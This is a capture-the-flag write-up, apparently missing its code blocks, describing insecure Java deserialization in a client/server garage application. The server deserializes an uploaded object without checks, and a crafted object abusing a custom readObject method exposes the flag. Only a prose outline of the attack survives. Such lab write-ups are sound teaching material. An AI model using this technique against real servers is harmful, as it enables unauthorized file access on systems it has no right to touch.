By Yaakov Cohen
We noticed that the jar file contained both the client's and the server's code.
Let's take a look at the server code. We see that when the client chooses
 Save garage the server serialize the garage object and sends it to the user:
Then the user takes the garage byte array and saves it to a file called "garage":
And when the client asks to
 Load existing garage the client takes the garage file and sends it to the server:
Then the server takes that stream and serializes it to a garage object without performing any checks:
garage class we can see a private object
private Employee garageManager; that is never set. In the the code flow of the
garageManager class we can see that the function
readObject has a custom implementation, this function will be executed when the object is serialized:
If only we could create a
garageManager and change
closeMessageFile attribute from
Wait a second, we can!
So the plan is:
We modified garage object:
Created a new garage object:
Sent it to the server:
 Load existing garage, and got the new garage object from server:
 Save garage.
In the object file we can see the flag: